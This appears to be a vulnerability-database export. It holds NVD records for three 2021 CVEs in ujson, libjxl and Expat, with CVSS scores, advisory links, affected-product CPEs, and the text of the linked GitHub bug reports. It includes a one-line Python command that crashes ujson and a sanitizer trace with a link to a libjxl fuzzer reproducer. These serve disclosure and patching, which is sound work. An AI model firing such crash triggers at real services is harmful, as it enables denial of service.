{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36009" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/ujson/OSV-2021-955.yaml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/501" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/502#issuecomment-1031747284" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/pull/504" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00023.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CN7W3GOXALINKFUUE7ICQIC2EF5HNKUQ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NAU5N4A7EUK2AMUCOLYDD5ARXAJYZBD2/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O6JUWQTJLA2CMG4CJN7DCUVSOXLZIIXL/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ULX35TSWLBBIMEH44MUORPXYYRZKEDC6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36009" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/ujson/OSV-2021-955.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/502#issuecomment-1031747284" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/pull/504" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00023.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CN7W3GOXALINKFUUE7ICQIC2EF5HNKUQ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NAU5N4A7EUK2AMUCOLYDD5ARXAJYZBD2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O6JUWQTJLA2CMG4CJN7DCUVSOXLZIIXL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ULX35TSWLBBIMEH44MUORPXYYRZKEDC6/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ultrajson_project:ultrajson:*:*:*:*:*:python:*:*", "matchCriteriaId": "15EEF95D-A74F-47A0-8FAB-E11AAA99A049", "versionEndExcluding": "5.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ultrajson/ultrajson/issues/501
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ultrajson", "ultrajson" ]
### What did you do? `python3 -c 'import ujson; print(ujson.encode({"a": True}, indent=65539))' >/dev/null` This is the smallest value that triggers the segfault on my machine with this build of ujson. I'm sure it's no coincidence that it's slightly larger than 64 KiB. ### What did you expect to happen? Properly (if poorly) formatted output ### What actually happened? SIGSEGV ### What versions are you using? * OS: Debian Sid * Python: 3.10.1 * UltraJSON: 316d384f --- I think the reason might lie in the fact that the `Buffer_Reserve` call in `encode` does not appear to account for indentation at all. I wouldn't be surprised if other things could also trigger buffer overruns in certain conditions, e.g. the absence of `JSON_NO_EXTRA_WHITESPACE` causing the insertion of extra spaces. #334 and #402 might be symptoms of the same underlying bug. Note that they both use indentation.
Segmentation fault with large indent
https://api.github.com/repos/ultrajson/ultrajson/issues/501/comments
3
2022-02-06T01:14:09Z
2022-10-19T05:50:15Z
https://github.com/ultrajson/ultrajson/issues/501
1,125,073,687
501
2,932
CVE-2021-45958
2022-01-01T00:15:08.813
UltraJSON (aka ujson) through 5.1.0 has a stack-based buffer overflow in Buffer_AppendIndentUnchecked (called from encode). Exploitation can, for example, use a large amount of indentation.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36009" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/ujson/OSV-2021-955.yaml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/501" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/502#issuecomment-1031747284" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/pull/504" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00023.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CN7W3GOXALINKFUUE7ICQIC2EF5HNKUQ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NAU5N4A7EUK2AMUCOLYDD5ARXAJYZBD2/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O6JUWQTJLA2CMG4CJN7DCUVSOXLZIIXL/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ULX35TSWLBBIMEH44MUORPXYYRZKEDC6/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36009" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/ujson/OSV-2021-955.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/issues/502#issuecomment-1031747284" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ultrajson/ultrajson/pull/504" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/02/msg00023.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CN7W3GOXALINKFUUE7ICQIC2EF5HNKUQ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NAU5N4A7EUK2AMUCOLYDD5ARXAJYZBD2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/O6JUWQTJLA2CMG4CJN7DCUVSOXLZIIXL/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ULX35TSWLBBIMEH44MUORPXYYRZKEDC6/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ultrajson_project:ultrajson:*:*:*:*:*:python:*:*", "matchCriteriaId": "15EEF95D-A74F-47A0-8FAB-E11AAA99A049", "versionEndExcluding": "5.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ultrajson/ultrajson/issues/502#issuecomment-1031747284
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ultrajson", "ultrajson" ]
Hi Recently [CVE-2021-45958](https://www.cve.org/CVERecord?id=CVE-2021-45958) was published which is an assignment due to the oss-fuzz report in https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36009 see as well https://github.com/google/oss-fuzz-vulns/blob/main/vulns/ujson/OSV-2021-955.yaml This reference says: events: - introduced: a920bfa9d85bcd78836b866d1be80c1e3dcca1da - fixed: 5525f8c9ef8bb879dadd0eb942d524827d1b0362 where though the 5525f8c9ef8bb879dadd0eb942d524827d1b0362 refers to a change in the AFL++ fuzzer: https://github.com/AFLplusplus/AFLplusplus/commit/5525f8c9ef8bb879dadd0eb942d524827d1b0362 (see https://oss-fuzz.com/revisions?job=libfuzzer_asan_ujson&range=202112170603:202112180609). Quoting a mail from MITRE: Some of the possibilities are: 1. There was never a buffer overflow. It was simply an artifact of an older version of the AFLplusplus fuzzing software. 2. There still is a buffer overflow, but it is no longer detected. In particular, the introduced value above corresponds to https://github.com/ultrajson/ultrajson/commit/a920bfa9d85bcd78836b866d1be80c1e3dcca1da -- this has function names that mention the "Buffer Append Unchecked" words. One might guess that "Unchecked" means accepting the risk of a buffer overflow. MITRE confirmed that the CVE could be rejected if it can be confirmed that the reproducer testcase from https://oss-fuzz.com/download?testcase_id=5751832088543232 does not have a buffer overflow for the ujson.encode call shown in https://github.com/google/oss-fuzz/blob/master/projects/ujson/hypothesis_structured_fuzzer.py for UltraJSON 4.0.2. Do you have any more insights here?
CVE-2021-45958 from oss-fuzz report
https://api.github.com/repos/ultrajson/ultrajson/issues/502/comments
3
2022-02-07T16:43:38Z
2022-04-05T20:04:40Z
https://github.com/ultrajson/ultrajson/issues/502
1,126,236,427
502
2,933
CVE-2021-45928
2022-01-01T01:15:08.367
libjxl b02d6b9, as used in libvips 8.11 through 8.11.2 and other products, has an out-of-bounds write in jxl::ModularFrameDecoder::DecodeGroup (called from jxl::FrameDecoder::ProcessACGroup and jxl::ThreadPool::RunCallState<jxl::FrameDecoder::ProcessSections).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 2.1, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36456" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/libvips/OSV-2021-1055.yaml" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/compare/v0.5...v0.6" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/issues/360" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/pull/365" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=36456" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/libvips/OSV-2021-1055.yaml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/compare/v0.5...v0.6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/issues/360" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libjxl/libjxl/pull/365" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libjxl_project:libjxl:*:*:*:*:*:*:*:*", "matchCriteriaId": "31276DF0-678C-43E1-8692-DB21D38A5164", "versionEndExcluding": "0.6.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/libjxl/libjxl/issues/360
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libjxl", "libjxl" ]
Hello, oss-fuzz is reporting an out of bounds write in libjxl master: ```   | AddressSanitizer:DEADLYSIGNAL   | =================================================================   | ==655724==ERROR: AddressSanitizer: SEGV on unknown address 0x000000001000 (pc 0x000002d55019 bp 0x7f4bc69f7a50 sp 0x7f4bc69f78c0 T2)   | ==655724==The signal is caused by a WRITE memory access.   | SCARINESS: 30 (wild-addr-write)   | #0 0x2d55019 in jxl::ModularFrameDecoder::DecodeGroup(jxl::Rect const&, jxl::BitReader*, int, int, jxl::ModularStreamId const&, bool, jxl::PassesDecoderState*, jxl::ImageBundle*) libjxl/lib/jxl/dec_modular.cc:329:20   | #1 0x2c0d17a in jxl::FrameDecoder::ProcessACGroup(unsigned long, jxl::BitReader* restrict*, unsigned long, unsigned long, bool, bool) libjxl/lib/jxl/dec_frame.cc:578:7   | #2 0x2c161e4 in operator() libjxl/lib/jxl/dec_frame.cc:731:16   | #3 0x2c161e4 in jxl::ThreadPool::RunCallState<jxl::FrameDecoder::ProcessSections(jxl::FrameDecoder::SectionInfo const*, unsigned long, jxl::FrameDecoder::SectionStatus*)::$_1, jxl::FrameDecoder::ProcessSections(jxl::FrameDecoder::SectionInfo const*, unsigned long, jxl::FrameDecoder::SectionStatus*)::$_2>::CallDataFunc(void*, unsigned int, unsigned long) libjxl/lib/jxl/base/data_parallel.h:88:14   | #4 0x31ac619 in RunRange libjxl/lib/threads/thread_parallel_runner_internal.cc:137:7 ``` Reproducer: http://www.rollthepotato.net/~john/.clusterfuzz-testcase-minimized-5454144264601600.jxl
Out of bounds write in master libjxl reported by oss-fuzz
https://api.github.com/repos/libjxl/libjxl/issues/360/comments
8
2021-07-26T11:42:15Z
2021-07-27T14:44:06Z
https://github.com/libjxl/libjxl/issues/360
952,813,258
360
2,934
CVE-2021-45960
2022-01-01T19:15:08.030
In Expat (aka libexpat) before 2.4.3, a left shift by 29 (or more) places in the storeAtts function in xmlparse.c can lead to realloc misbehavior (e.g., allocating too few bytes, or only freeing memory).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/01/17/3" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Permissions Required", "Third Party Advisory" ], "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1217609" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-484086.pdf" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/issues/531" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/534" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-24" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220121-0004/" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5073" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.tenable.com/security/tns-2022-05" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/01/17/3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Permissions Required", "Third Party Advisory" ], "url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1217609" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-484086.pdf" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/issues/531" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/534" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-24" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220121-0004/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://www.debian.org/security/2022/dsa-5073" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.tenable.com/security/tns-2022-05" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "7A2FBF20-7B2C-49FF-83F8-1EF903078751", "versionEndExcluding": "2.4.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "matchCriteriaId": "C42F5145-1F37-40E2-AD83-495F7012BC3D", "versionEndExcluding": "8.15.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "matchCriteriaId": "112367D4-EF51-4050-834C-7E887A5C52D9", "versionEndExcluding": "10.1.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "10.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", "matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:siemens:sinema_remote_connect_server:*:*:*:*:*:*:*:*", "matchCriteriaId": "98CC9C9A-FE14-4D50-A8EC-C309229356C8", "versionEndExcluding": "3.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610c:*:*:*:*:*:*:*", "matchCriteriaId": "78BE572F-45C1-467F-918F-FB1276F6B495", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*", "matchCriteriaId": "DE7C6010-F736-4BDA-9E3B-C4370BBFA149", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h615c:*:*:*:*:*:*:*", "matchCriteriaId": "646FFC2B-6DC4-4BD8-AAE0-81895D397700", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_workflow_automation:-:*:*:*:*:*:*:*", "matchCriteriaId": "5735E553-9731-4AAC-BCFF-989377F817B3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:solidfire_\\&_hci_management_node:-:*:*:*:*:*:*:*", "matchCriteriaId": "D6D700C5-F67F-4FFB-BE69-D524592A3D2E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": 